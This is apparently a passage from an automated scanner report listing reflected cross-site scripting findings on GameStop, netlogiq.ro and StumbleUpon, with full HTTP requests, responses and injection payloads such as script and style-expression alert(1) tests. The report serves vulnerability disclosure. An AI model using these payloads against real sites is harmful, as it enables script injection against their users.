Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117799
Date: Tue, 19 Jul 2011 16:02:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:35 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/JavaScriptc4c2e' a=b 58959062e85/CertonaTable.htm' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.135. http://www.gamestop.com/JavaScript/CertonaTable.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /JavaScript/CertonaTable.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 757bf'%20a%3db%2029f44a6dade was submitted in the REST URL parameter 2. This input was echoed as 757bf' a=b 29f44a6dade in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JavaScript/CertonaTable.htm757bf'%20a%3db%2029f44a6dade HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117455
Date: Tue, 19 Jul 2011 16:02:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:37 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/JavaScript/CertonaTable.htm757bf' a=b 29f44a6dade' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.136. http://www.gamestop.com/Recommendations.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /Recommendations.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32a35'%20a%3db%20af794d36cbc was submitted in the REST URL parameter 1. This input was echoed as 32a35' a=b af794d36cbc in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /Recommendations.axd32a35'%20a%3db%20af794d36cbc HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
Content-Length: 122
Origin: http://www.gamestop.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

{"l":"peYfab2EsTTWwlqkVMgA4Q==","r":"rcxKUs77Dw02ESv5cb+e+w==","rr":"IF8Yy95dSt9Ecb50XY6Mog==","c":"Locale=en-US","su":""}

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117439
Date: Tue, 19 Jul 2011 16:02:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:40 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/Recommendations.axd32a35' a=b af794d36cbc' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.137. http://www.gamestop.com/ScriptResource.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb13a'%20a%3db%208855338f870 was submitted in the REST URL parameter 1. This input was echoed as eb13a' a=b 8855338f870 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ScriptResource.axdeb13a'%20a%3db%208855338f870?d=JUWzwDM6J1O9dvzPL3WifBcDrceKUILBVALOotNA8ZNC3NRB-tqVx2rqwB4j25dIdNmSckr1NnDdVSb8someErW3DymlJx0hNOZI23Og7ARy99QWf-Fc0jT2IBslLCo2KmsaCC6X_4v932KibHmTRWWUGBk1&t=ffffffff8457574f HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 118139
Date: Tue, 19 Jul 2011 16:02:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:29 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/ScriptResource.axdeb13a' a=b 8855338f870?d=JUWzwDM6J1O9dvzPL3WifBcDrceKUILBVALOotNA8ZNC3NRB-tqVx2rqwB4j25dIdNmSckr1NnDdVSb8someErW3DymlJx0hNOZI23Og7ARy99QWf-Fc0jT2IBslLCo2KmsaCC6X_4v932KibHmTRWWUGBk1%26t=ffffffff8457574f' id='header_auth_act
...[SNIP]...

4.138. http://www.gamestop.com/WebResource.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6bec'%20a%3db%2082afe38e9ca was submitted in the REST URL parameter 1. This input was echoed as d6bec' a=b 82afe38e9ca in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /WebResource.axdd6bec'%20a%3db%2082afe38e9ca?d=m1DsqMTwlT-RGKCtGfxYBloVHh8h1knnFeXre9UxNqlvQUJW8dGTdDWRsiHUrmCXBrjrQGgZOAdWXPjXXqW6hMxBZ5dbvnDeZYCfMfzz3iK7REQi4IgFM-qEapKq_OJ4cGSjRI07slCVxwBCJybWFmGxp6tqRzha4upPnJ4xzb8zhk060&t=634465910017528089 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LocaleCookie=en-us; MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; CactusState=V=1; BIGipServerwww.gamestop.com-80=650777772.20480.0000

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117835
Date: Tue, 19 Jul 2011 16:02:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:28 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/WebResource.axdd6bec' a=b 82afe38e9ca?d=m1DsqMTwlT-RGKCtGfxYBloVHh8h1knnFeXre9UxNqlvQUJW8dGTdDWRsiHUrmCXBrjrQGgZOAdWXPjXXqW6hMxBZ5dbvnDeZYCfMfzz3iK7REQi4IgFM-qEapKq_OJ4cGSjRI07slCVxwBCJybWFmGxp6tqRzha4upPnJ4xzb8zhk060%26t=6344659100175280
...[SNIP]...

4.139. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /common/gui/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2cca'%20a%3db%20760b5dafaf4 was submitted in the REST URL parameter 1. This input was echoed as c2cca' a=b 760b5dafaf4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commonc2cca'%20a%3db%20760b5dafaf4/gui/favicon.ico HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Content-Type: text/html; charset=utf-8
Content-Length: 117789
Cache-Control: private, max-age=86400
Date: Tue, 19 Jul 2011 16:02:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/commonc2cca' a=b 760b5dafaf4/gui/favicon.ico' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.140. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /common/gui/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89455'style%3d'x%3aexpression(alert(1))'346df7674c3 was submitted in the REST URL parameter 2. This input was echoed as 89455'style='x:expression(alert(1))'346df7674c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /common/gui89455'style%3d'x%3aexpression(alert(1))'346df7674c3/favicon.ico HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Content-Type: text/html; charset=utf-8
Content-Length: 117835
Cache-Control: private, max-age=86394
Date: Tue, 19 Jul 2011 16:02:44 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/common/gui89455'style='x:expression(alert(1))'346df7674c3/favicon.ico' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.141. http://www.gamestop.com/common/gui/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /common/gui/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 38729'style%3d'x%3aexpression(alert(1))'5d861ec7448 was submitted in the REST URL parameter 3. This input was echoed as 38729'style='x:expression(alert(1))'5d861ec7448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /common/gui/favicon.ico38729'style%3d'x%3aexpression(alert(1))'5d861ec7448 HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=783322707284241; RES_SESSIONID=463845686754211; ResonanceSegment=1; rsi_segs=D08734_70056|D08734_70065|10165; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B%20s_ppv%3D26%252C26%252C723%3B

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117491
Date: Tue, 19 Jul 2011 16:02:46 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:47 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,4294; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com:80/common/gui/favicon.ico38729'style='x:expression(alert(1))'5d861ec7448' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

4.142. http://www.netlogiq.ro/Portofoliu-Web-Design.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlogiq.ro
Path:   /Portofoliu-Web-Design.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac71"><script>alert(1)</script>251e3ca71be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Portofoliu-Web-Design.html?6ac71"><script>alert(1)</script>251e3ca71be=1 HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245; sifrFetch=true; __utma=147345704.25025431.1311097255.1311097255.1311097255.1; __utmb=147345704.1.10.1311097255; __utmc=147345704; __utmz=147345704.1311097255.1.1.utmcsr=umfcluj.ro|utmccn=(referral)|utmcmd=referral|utmcct=/search.aspx

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:44:45 GMT
Content-Length: 224574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<a href="/Portofoliu-Web-Design?6ac71"><script>alert(1)</script>251e3ca71be=1--cID105--y0--m0--pag1.html ">
...[SNIP]...

4.143. http://www.stumbleupon.com/submit [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e4de"style%3d"x%3aexpression(alert(1))"0d3e962a0e4 was submitted in the url parameter. This input was echoed as 4e4de"style="x:expression(alert(1))"0d3e962a0e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

